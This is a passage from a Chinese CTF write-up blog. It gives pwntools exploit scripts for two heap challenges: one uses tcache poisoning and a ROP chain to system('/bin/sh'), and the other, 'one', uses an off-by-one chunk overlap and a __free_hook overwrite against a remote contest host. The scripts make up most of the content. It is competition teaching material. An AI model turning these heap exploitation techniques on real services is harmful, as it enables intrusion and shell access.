class="line"></span><br><span class="line">delete(<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(i, <span class="number">0x80</span>, <span class="string">b"a"</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">8</span>, <span class="number">0x80</span>, <span class="string">b"a"</span>)</span><br><span class="line">add(<span class="number">9</span>, <span class="number">0x80</span>, <span class="string">b"a"</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x300</span>, <span class="string">b"A"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    delete(i)  </span><br><span class="line"></span><br><span class="line">delete(<span class="number">9</span>)</span><br><span class="line">delete(<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">11</span>, <span class="number">0x80</span>, <span class="string">b"a"</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">9</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b"a"</span> * <span class="number">0x80</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">payload += p64(environ ^ (heap_base &gt;&gt; <span class="number">12</span>))</span><br><span class="line">add(<span class="number">12</span>, <span class="number">0xa0</span>, payload)</span><br><span class="line"></span><br><span class="line">payload = p64(libc_base + libc.sym[<span class="string">'system'</span>])</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x80</span>, payload)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x80</span>, <span class="string">b"a"</span> * <span class="number">0x10</span>)</span><br><span class="line"><span class="comment"># debug()</span></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">p.recv()</span><br><span class="line">p.recvuntil(<span class="string">b"a"</span> * <span class="number">0x10</span>)</span><br><span class="line">stack_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>))</span><br><span class="line">success(<span class="string">"stack_addr: "</span> + <span class="built_in">hex</span>(stack_addr))</span><br><span class="line">ret_addr_base = stack_addr + (<span class="number">0x7ffcc5d20ce0</span> - <span class="number">0x7ffcc5d20e18</span>) + <span class="number">0x10</span> - <span class="number">0x20</span></span><br><span class="line"><span class="comment"># print((libc_base + libc.sym["__environ"] &gt; libc_base + libc.sym["puts"] + 0x33636))</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">12</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b"a"</span> * <span class="number">0x80</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x91</span>)</span><br><span class="line">payload += p64(ret_addr_base ^ (heap_base &gt;&gt; <span class="number">12</span>))</span><br><span class="line"></span><br><span class="line">add(<span class="number">12</span>, <span class="number">0xa0</span>, payload)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b"a"</span> * <span class="number">8</span></span><br><span class="line">payload += p64(libc_base + libc.search(asm(<span class="string">"pop rdi; ret"</span>)).__next__())</span><br><span class="line">payload += p64(libc_base + libc.search(<span class="string">b"/bin/sh\x00"</span>).__next__())</span><br><span class="line">payload += p64(libc_base + libc.search(asm(<span class="string">"pop rdi; ret"</span>)).__next__() + <span class="number">1</span>)</span><br><span class="line">payload += p64(libc_base + libc.sym[<span class="string">"system"</span>])</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x80</span>, <span class="string">b"a"</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x80</span>, payload)</span><br><span class="line"></span><br><span class="line">inter()</span><br></pre></td></tr></table></figure>
<p>获取flag截图</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108161044512.png"></p>
<h3 id="one-winegee">one <span class="citation" data-cites="Winegee">@Winegee</span></h3>
<p>在edit里有一个off by one</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108155153703.png"></p>
<p>我们可以利用这个off by one来修改下一个chunk的size位</p>
<p>程序没有给libc，先抓一下字符串看一下是用什么操作系统编译的</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108155250077.png"></p>
<p>18.04的ubuntu猜测是2.27的libc，从glibc all in one当中抓出对应版本lib，开始打</p>
<p>本题思路如下：</p>
<ul>
<li>先申请三个相同大小的堆块，接着edit堆块0，off by one到堆块1的size，使其堆块1的size可以包含堆块2</li>
<li>接着把堆块2 free掉，此时堆块2掉入tcachebin，再将堆块1 free掉，此时造成了chunk overlap</li>
<li>再次申请刚刚off by one的size大小的堆块，就可以修改到堆块2的fd指针，修改为tcache_pthread_struct结构体的地址</li>
<li>申请堆块2 size大小的堆块，劫持tcache_pthread_struct，接着伪造对应位置堆块的count，再将对应size的堆块free掉，使其掉入unsorted bin泄露libc</li>
<li>伪造对应size大小堆块的指针，使其指向free hook，申请出来劫持free hook为system，完成利用</li>
</ul>
<p>本题exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> struct <span class="keyword">import</span> pack</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">s</span>(<span class="params">a</span>):</span><br><span class="line">    p.send(a)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sa</span>(<span class="params">a, b</span>):</span><br><span class="line">    p.sendafter(a, b)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sl</span>(<span class="params">a</span>):</span><br><span class="line">    p.sendline(a)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sla</span>(<span class="params">a, b</span>):</span><br><span class="line">    p.sendlineafter(a, b)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">r</span>():</span><br><span class="line">    p.recv()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pr</span>():</span><br><span class="line">    <span class="built_in">print</span>(p.recv())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">rl</span>(<span class="params">a</span>):</span><br><span class="line">    <span class="keyword">return</span> p.recvuntil(a)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">inter</span>():</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#    pause()</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_addr</span>():</span><br><span class="line">    <span class="keyword">return</span> u64(p.recvuntil(<span class="string">b'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_sb</span>():</span><br><span class="line">    <span class="keyword">return</span> libc_base + libc.sym[<span class="string">'system'</span>], libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b'/bin/sh\x00'</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">context(os=<span class="string">'linux'</span>, arch=<span class="string">'amd64'</span>, log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process('./pwn')</span></span><br><span class="line">p = remote(<span class="string">"45.40.247.139"</span>, <span class="number">31531</span>)</span><br><span class="line"><span class="comment"># p = remote("45.40.247.139", 15222)</span></span><br><span class="line"><span class="comment"># libc = ELF("./libc.so.6")</span></span><br><span class="line">libc = ELF(<span class="string">"./libc-2.27-1.5.so"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx, size, content</span>):</span><br><span class="line">    sla(<span class="string">b"5.exit"</span>, <span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">    sla(<span class="string">b"the index of command?"</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    sla(<span class="string">b"the size of command?"</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    sa(<span class="string">b"the command?"</span>, content)</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    sla(<span class="string">b"5.exit"</span>, <span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line">    sla(<span class="string">b"which one?"</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    sla(<span class="string">b"5.exit"</span>, <span class="built_in">str</span>(<span class="number">3</span>))</span><br><span class="line">    sla(<span class="string">b"which one?"</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, content</span>):</span><br><span class="line">    sla(<span class="string">b"5.exit"</span>, <span class="built_in">str</span>(<span class="number">4</span>))</span><br><span class="line">    sla(<span class="string">b"which one?"</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    sa(<span class="string">b"what to change?"</span>, content)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b"Let me know if u are not a rebot.\n"</span>)</span><br><span class="line">calc = p.recvline().decode()</span><br><span class="line">a , b = calc.split(<span class="string">"+"</span>)</span><br><span class="line">b = b.split(<span class="string">"="</span>)[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">c = <span class="built_in">eval</span>(a) + <span class="built_in">eval</span>(b)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(c))</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x81</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x70</span>, <span class="string">b"\x00"</span>) + p64(<span class="number">0x80</span>) + <span class="string">b"\x90"</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">2</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">p.recv()</span><br><span class="line">heap_base = (u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>)) &gt;&gt; <span class="number">12</span> ) &lt;&lt; <span class="number">12</span></span><br><span class="line">heap_base = heap_base - <span class="number">0x1000</span></span><br><span class="line">success(<span class="string">"heap_base: "</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line">add(<span class="number">3</span>, <span class="number">0x100</span>, <span class="string">b"b"</span>)</span><br><span class="line">add(<span class="number">4</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b"a"</span> * <span class="number">0x78</span> + <span class="string">b"\xf1"</span></span><br><span class="line">edit(<span class="number">0</span>, payload) </span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>, <span class="number">0xe0</span>, <span class="string">b"a"</span>)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">payload = <span class="string">b"a"</span> * <span class="number">0x78</span> + p64(<span class="number">0x81</span>) + p64(heap_base + <span class="number">0x10</span>)</span><br><span class="line">edit(<span class="number">1</span>, payload)</span><br><span class="line"></span><br><span class="line">add(<span class="number">5</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line">add(<span class="number">6</span>, <span class="number">0x100</span>, <span class="string">b"a"</span>)</span><br><span class="line">add(<span class="number">7</span>, <span class="number">0x200</span>, <span class="string">b"/bin/sh"</span>)</span><br><span class="line">add(<span class="number">2</span>, <span class="number">0x78</span>, <span class="string">b"a"</span>)</span><br><span class="line">offset = <span class="number">0x100</span> // <span class="number">0x10</span> - <span class="number">1</span></span><br><span class="line">payload = <span class="string">b"\x00"</span> * offset + <span class="string">b"\x07"</span></span><br><span class="line">payload = payload.ljust(<span class="number">64</span>, <span class="string">b"\x00"</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>, payload)</span><br><span class="line"><span class="comment"># debug()</span></span><br><span class="line">delete(<span class="number">6</span>)</span><br><span class="line">add(<span class="number">6</span>, <span class="number">0x100</span>, <span class="string">b"a"</span> * <span class="number">8</span>)</span><br><span class="line">show(<span class="number">6</span>)</span><br><span class="line">p.recv()</span><br><span class="line">p.recvuntil(<span class="string">b"a"</span> * <span class="number">8</span>)</span><br><span class="line">libc_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>)) - (<span class="number">0x71d47e9ebca0</span> - <span class="number">0x71d47e600000</span>)</span><br><span class="line">success(<span class="string">"libc_base: "</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">system = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b"\x01"</span>.ljust(<span class="number">64</span>, <span class="string">b"\x00"</span>)</span><br><span class="line">payload += p64(free_hook)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>, payload)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">6</span>)</span><br><span class="line">add(<span class="number">6</span>, <span class="number">0x10</span>, p64(system))</span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">inter()</span><br></pre></td></tr></table></figure>
<p>获取flag截图</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108160626911.png"></p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/06/26/Ssec/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">2024软件安全原理与实践课程实验报告</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>






</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2025 晚栀winegee~
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/preccrep/hexo-theme-jelly" target="_blank">Jelly</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: false,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




  </div>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
</body>
</html>